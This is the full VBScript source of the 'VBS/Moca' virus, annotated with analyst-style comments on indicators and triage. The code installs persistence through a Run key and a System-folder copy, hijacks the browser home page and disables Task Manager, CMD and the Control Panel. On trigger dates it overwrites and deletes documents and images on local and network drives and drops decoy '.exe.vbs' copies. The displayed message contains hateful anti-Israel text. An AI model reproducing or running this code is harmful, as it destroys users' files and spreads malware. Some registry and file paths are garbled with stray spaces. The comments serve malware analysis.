rem - VBS/Moca "DL BirthDay" Virus
rem - Written by D.L. on November 8th, 2003
rem - Written by D.L. on June 24th, 2010
rem - Script entry point. Error reporting is switched off for the whole script,
rem - so a failed file or registry operation is skipped silently and leaves no
rem - visible error dialog on the affected host.
On Error Resume Next
dim FSobj,winDir,sysDir,copySelf,newFile,rawFileData,hackedFileData,fixData,dataFixed,newFileData,copySelfComplete
rem - Scripting.FileSystemObject is the handle used for every file operation below.
set FSobj=CreateObject("Scripting.FileSystemObject")
rem - GetSpecialFolder(1) is the Windows System folder; the dropped files
rem - sys-Moca.vbs and MocaMssg.bat are written there.
set sysDir=FSobj.GetSpecialFolder(1)
rem - Runs as soon as the script is executed; there is no user interaction.
checkDate()
rem - Date-gated dispatcher. On 8 November or 24 June (local clock) it runs the
rem - destructive routines; on every other day it only installs persistence.
rem - For responders: a host can carry the persistence artifacts for months
rem - before any file damage appears, so absence of damage is not a clean result.
function checkDate()
if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then
rem - Trigger date: overwrite files, show the message, copy the script around.
beginInfestation()
displayMessage()
Dupler()
else
rem - Any other date: drop the System-folder copy and write registry values.
plantTrojanizedFile()
end if
end function
rem - Persistence routine, taken on every run that is not a trigger date.
rem - It writes a decoded copy of the body built by writeCopy() to
rem - <System folder>\sys-Moca.vbs, registers that file under the machine Run
rem - key, and issues a series of registry writes aimed at the browser home page,
rem - user policies, the logon notice and the mouse buttons.
rem - Host indicators visible in this block: the file sys-Moca.vbs in the System
rem - folder, a Run value named sysMoca, and the URL written to the IE keys.
function plantTrojanizedFile()
rem - Create (or truncate) the drop file and close it so it can be reopened below.
set copySelf=FSobj.CreateTextFile(sysDir+"\sys-Moca.vbs")
copySelf.close
rem - Opens the running script read-only (mode 1); newFile is not read anywhere
rem - in this function.
set newFile=FSobj.OpenTextFile(WScript.ScriptFullname,1)
rem - writeCopy() fills the global rawFileData with the encoded script body.
writeCopy()
rem - Reverse the character substitution used in rawFileData:
rem - chr(42) * becomes D, chr(37) % becomes L, chr(124) | becomes ".",
rem - and chr(94) ^ becomes a double quote.
hackedFileData=replace(rawFileData,chr(42),chr(68))
fixData=replace(hackedFileData,chr(37),chr(76))
dataFixed=replace(fixData,chr(124),chr(46))
newFileData=replace(dataFixed,chr(94),"""")
rem - Mode 2 is ForWriting: the decoded body replaces the drop file's content.
set copySelfComplete=FSobj.OpenTextFile(sysDir+"\sys-Moca.vbs",2)
copySelfComplete.write newFileData
copySelfComplete.close
rem - Browser hijack: per-user Internet Explorer start page and default page.
createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Start Page","http://www.it.polinpdg.ac.com"
createRegKey "HKEY_CURRENT_USER\Software\Microsoft\Internet Explorer\Main\Default_Page_URL","http://www.it.polinpdg.ac.com"
rem - Autostart: machine-wide Run value pointing at the dropped script. Writing
rem - under HKEY_LOCAL_MACHINE normally needs administrative rights.
createRegKey "HKEY_LOCAL_MACHINE\Software\Microsoft\Windows\CurrentVersion\Run\sysMoca",sysDir&"\sys-Moca.vbs"
rem - Intended policy and logon changes: taskbar settings, command prompt, Task
rem - Manager, Control Panel, hidden file extensions, logon notice caption and
rem - text, swapped mouse buttons. Disabling Task Manager and the command prompt
rem - removes the tools a user would reach for first, and hiding extensions
rem - makes a ".exe.vbs" file display as ".exe".
rem - NOTE(review): as printed, these key paths contain stray spaces and the
rem - calls pass a third argument that createRegKey does not declare. Treat the
rem - list as intended targets and confirm each value in the registry during
rem - triage instead of assuming it was written.
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \NoSetTaskbar" ,"1","REG_ DWORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableC MD","1"," REG_DW ORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \System\DisableT askMgr"," 1","RE G_DWORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ NoControlPanel" ,"1"," REG_DWORD"
createRegKey "HKEY_CURRENT_ USER\Software\ Microsoft\ Windows\CurrentVersion\Policies \Explorer\ Advanced\ HideFileExt" ,"1","REG_DWORD"
createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeCapti on", "THE d'commend-X - Moca-x"
createRegKey "HKEY_LOCAL_ MACHINE\Software \Microsoft\ Windows\CurrentVersion\ Winlogon\ LegalNoticeText" ,"ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL "
createRegKey "HKEY_CURRENT_USER/Control Panel/Mouse SwapMouseButtons", "1","REG_ DWORD"
end function
rem - Thin wrapper around WScript.Shell.RegWrite.
rem - regKey: full registry path of the value to write.
rem - regVal: data to store. No value type is passed to RegWrite here.
rem - A new WScript.Shell object is created on every call. Registry writes made
rem - by the script host process are the observable event for detection.
sub createRegKey(regKey,regVal)
dim regEdit
set regEdit=CreateObject("WScript.Shell")
regEdit.RegWrite regKey,regVal
end sub
rem - Trigger-date routine: walks every drive the FileSystemObject reports and
rem - hands the root of each fixed (DriveType 2) or network (DriveType 3) drive
rem - to indexFolders. Mapped network shares are therefore in scope, so damage
rem - assessment has to include file servers reachable from the host.
sub beginInfestation
rem - Errors such as an inaccessible drive are skipped silently.
On Error Resume Next
dim drive,machine,complete
set machine=FSobj.Drives
for each drive in machine
if (drive.DriveType=2)or(drive.DriveType=3) then
indexFolders(drive.Path&"\")
end If
next
rem - complete is never assigned a value in this sub.
beginInfestation=complete
end sub
rem - Recursive directory walk. For each subfolder of location it calls
rem - spreadData on that subfolder and then recurses into it.
rem - location: folder path to enumerate.
rem - Only subfolders are passed to spreadData, so files sitting directly in the
rem - starting folder are not handled by this routine.
sub indexFolders(location)
rem - Access-denied and similar errors are ignored, so the walk continues.
On Error Resume Next
dim specs, file, subFol
set specs=FSobj.GetFolder(location)
set subFol=specs.SubFolders
rem - The loop variable is named file but iterates over folders.
for each file in subFol
spreadData(file.Path)
indexFolders(file.Path)
next
end sub
rem - Destructive payload for one folder. Every file whose extension is jpg,
rem - gif, log, ini, doc or docx is opened for writing (which truncates it),
rem - filled with a short message, copied to <base name>.txt in the same folder,
rem - and the original is then deleted.
rem - location: folder whose files are processed.
rem - The content is overwritten before the copy is made, so the resulting .txt
rem - holds only the message; recovery depends on backups or shadow copies.
rem - Detection cue: many small .txt files with identical content containing the
rem - message string below, appearing as jpg/gif/log/ini/doc/docx files vanish.
sub spreadData(location)
On Error Resume Next
dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete
set folder=FSobj.GetFolder(location)
set directory=folder.Files
orgMes="Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca"
rem - These replace calls target *, | and %, none of which occur in orgMes, so
rem - finalMes ends up equal to orgMes.
mesStageTwo=replace(orgMes,chr(42),chr(68))
mesStageThree=replace(mesStageTwo,chr(124),chr(46))
finalMes=replace(mesStageThree,chr(37),chr(76))
for each file in directory
extName=lcase(FSobj.GetExtensionName(file.Path))
rem - complete is assigned here but not used afterwards in this sub.
complete=lcase(file.Name)
rem - The three branches below differ only in the extensions they match.
if (extName="jpg")or(extName="gif")then
rem - Mode 2 (ForWriting) discards the existing content of the file.
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="log")or(extName="ini") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
elseIf (extName="doc")or(extName="docx") then
set generateCopy = FSobj.OpenTextFile(file.Path, 2, True)
generateCopy.write finalMes
generateCopy.Close
appName=FSobj.GetBaseName(file.Path)
set adExt=FSobj.GetFile(file.Path)
adExt.copy(location&"\"&appName&".txt")
FSobj.DeleteFile (file.Path)
end if
next
end sub
rem - Trigger-date routine that copies the script to a fixed list of paths on
rem - drives C: through K:. The target names imitate installers, security tools
rem - and system files, and several use a double extension such as ".exe.vbs";
rem - with file extensions hidden these display as ".exe" or ".ini".
rem - One target is the All Users Startup folder, which is a second autostart
rem - location next to the Run value written by plantTrojanizedFile.
rem - NOTE(review): the script-path property and several target paths are
rem - printed with stray dots and spaces, and errors are suppressed, so confirm
rem - on disk which copies exist. Hunt for the file names with the spaces removed.
function Dupler()
set Dupler = FSobj.GetFile (WScript.ScriptFull.Name)
Dupler.Copy ("C:\Program Files\Microsof 0ffice\0ffice12\Moca.vbs" )
Dupler.Copy ("C:\Documents and Settings\All Users\StartMenu\Programs\Startup\Desktop.ini.vbs")
Dupler.Copy ("C:\Documents and Settings\AllUsers\Desktop\ Dajjal_Antivirus .exe.vbs" )
Dupler.Copy ("C:\Windows\ System32\ Restore\rstrui. exe.vbs")
Dupler.Copy ("D:\Program\ MotoGP_SETUP. vbs")
Dupler.Copy ("E:\Program\ TuneUp2009_ SETUP.vbs" )
Dupler.Copy ("F:\Program\ Smadav. vbs")
Dupler.Copy ("G:\Program\ DeltaForce_ SETUP.vbs" )
Dupler.Copy ("H:\Program\ DeltaForce_ SETUP.vbs" )
Dupler.Copy ("I:\Program\ Ansav_SETUP. vbs")
Dupler.Copy ("J:\Program\ Project.vbs" )
Dupler.Copy ("J:\Program\ SM?RTP.exe.vbs" )
Dupler.Copy ("J:\Program\ %SM%RTP%.exe.vbs" )
Dupler.Copy ("K:\Program\ Moca.vbs" )
end function
rem - Trigger-date routine that writes a batch file, MocaMssg.bat, into the
rem - System folder and runs it to show a console message to the user.
rem - Host indicators: <System folder>\MocaMssg.bat, and the script host
rem - launching a batch file from that folder.
function displayMessage()
dim shell,messageFile
set shell = CreateObject("WScript.Shell")
rem - The file is created and closed once, then created again below after
rem - FSobj is re-instantiated; only the second handle is written to.
set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
messageFile.close
set FSobj=CreateObject("Scripting.FileSystemObject")
set messageFile=FSobj.CreateTextFile(sysDir&"\MocaMssg.bat")
rem - Batch content: set the window title, clear the screen, echo the message
rem - lines, then pause so the window stays open.
messageFile.WriteLine("@title Happy Birthday to me! :) - VBS/Moca Virus")
messageFile.WriteLine("@cls")
messageFile.WriteLine("@@echo ASSALAMUALA IKUM, YA AHLIL KUBUR-say Fack for ISRAEL")
messageFile.WriteLine("@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(")
messageFile.WriteLine("@echo. When you kill me...! ")
messageFile.WriteLine("@echo. i can delet all your file......! ")
messageFile.WriteLine("@echo. you can try it....@_@")
messageFile.WriteLine("@echo. say Fack for ISRAEL-say Fack for ISRAEL-say Fack for ISRAEL say-Fack for ISRAEL ")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@echo. say Fack for ISRAEL")
messageFile.WriteLine("@pause")
messageFile.close
rem - Executes the batch file that was just written.
shell.Run(sysDir&"\MocaMssg.bat")
end function
rem - Builds the text that plantTrojanizedFile writes to sys-Moca.vbs and stores
rem - it in the global rawFileData; nothing is returned.
rem - The text is a reduced copy of this script in substituted form: ^ stands
rem - for a double quote, | for a dot, and * and % for the letters D and L. The
rem - caller reverses the substitution before writing the file.
rem - The embedded copy contains checkDate, beginInfestation, indexFolders,
rem - spreadData and displayMessage only; it has no plantTrojanizedFile, Dupler
rem - or registry writes, and its third extension branch matches doc/exe where
rem - the outer script matches doc/docx. The dropped file therefore does not
rem - match the original byte for byte; hash-based detection needs both samples.
rem - String signatures should cover the substituted form (for example
rem - FSobj|GetFolder) as well as the decoded form.
function writeCopy()
rawFileData="rem - VBS/Moca ^DL BirthDay^ Virus by *|%|" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim FSobj,winDir,sysDir" &vbcrlf& _
"set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
"set sysDir=FSobj|GetSpecialFolder(1)" &vbcrlf& _
"checkDate()" &vbcrlf& _
"function checkDate()" &vbcrlf& _
"if (day(Now)=8 and month(Now)=11)or(day(Now)=24 and month(Now)=6) then" &vbcrlf& _
"beginInfestation()" &vbcrlf& _
"displayMessage()" &vbcrlf& _
"end if" &vbcrlf& _
"end function" &vbcrlf& _
"sub beginInfestation" &vbcrlf& _
"On Error Resume Next " &vbcrlf& _
"dim drive,machine,complete" &vbcrlf& _
"set machine=FSobj|Drives " &vbcrlf& _
"for each drive in machine " &vbcrlf& _
"if (drive|DriveType=2)or(drive|DriveType=3) then" &vbcrlf& _
"indexFolders(drive|Path&^\^)" &vbcrlf& _
"end If" &vbcrlf& _
"next" &vbcrlf& _
"beginInfestation=complete" &vbcrlf& _
"end sub" &vbcrlf& _
"sub indexFolders(location)" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim specs, file, subFol" &vbcrlf& _
"set specs=FSobj|GetFolder(location)" &vbcrlf& _
"set subFol=specs|SubFolders" &vbcrlf& _
"for each file in subFol" &vbcrlf& _
"spreadData(file|Path)" &vbcrlf& _
"indexFolders(file|Path)" &vbcrlf& _
"next" &vbcrlf& _
"end sub" &vbcrlf& _
"sub spreadData(location)" &vbcrlf& _
"On Error Resume Next" &vbcrlf& _
"dim folder,directory,file,generateCopy,appName,adExt,orgMes,mesStageTwo,mesStageThree,finalMes,extName,complete" &vbcrlf& _
"set folder=FSobj|GetFolder(location)" &vbcrlf& _
"set directory=folder|Files" &vbcrlf& _
"finalMes=^Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus...Written by Moca^" &vbcrlf& _
"for each file in directory" &vbcrlf& _
"extName=lcase(FSobj|GetExtensionName(file|Path))" &vbcrlf& _
"complete=lcase(file|Name)" &vbcrlf& _
"if (extName=^jpg^)or(extName=^gif^)then " &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes " &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"elseIf (extName=^log^)or(extName=^ini^) then" &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes" &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"elseIf (extName=^doc^)or(extName=^exe^) then" &vbcrlf& _
"set generateCopy = FSobj|OpenTextFile(file|Path, 2, True)" &vbcrlf& _
"generateCopy|write finalMes" &vbcrlf& _
"generateCopy|Close" &vbcrlf& _
"appName=FSobj|GetBaseName(file|Path)" &vbcrlf& _
"set adExt=FSobj|GetFile(file|Path)" &vbcrlf& _
"adExt|copy(location&^\^&appName&^|txt^)" &vbcrlf& _
"FSobj|DeleteFile (file|Path)" &vbcrlf& _
"end if" &vbcrlf& _
"next" &vbcrlf& _
"end sub" &vbcrlf& _
"function displayMessage()" &vbcrlf& _
"dim shell,messageFile" &vbcrlf& _
"set shell = CreateObject(^WScript|Shell^)" &vbcrlf& _
"set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
"messageFile|close" &vbcrlf& _
"set FSobj=CreateObject(^Scripting|FileSystemObject^)" &vbcrlf& _
"set messageFile=FSobj|CreateTextFile(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
"messageFile.WriteLine(^@title Happy Birthday to me! :) - VBS/Moca Virus^)" &vbcrlf& _
"messageFile.WriteLine(^@cls^)" &vbcrlf& _
"messageFile.WriteLine(^@echo Happy BirthDay to me! :) - You have been infected with the VBS/Moca Virus :(^)" &vbcrlf& _
"messageFile.WriteLine(^@echo. When you kill me...! ^)" &vbcrlf& _
"messageFile.WriteLine(^@echo. i can delet all your file......! ^)" &vbcrlf& _
"messageFile.WriteLine(^@echo. you can try it....@_@^)" &vbcrlf& _
"messageFile.WriteLine(^@pause^)"&vbcrlf& _
"messageFile.close" &vbcrlf& _
"shell|Run(sysDir&^\MocaMssg|bat^)" &vbcrlf& _
"end function"
end function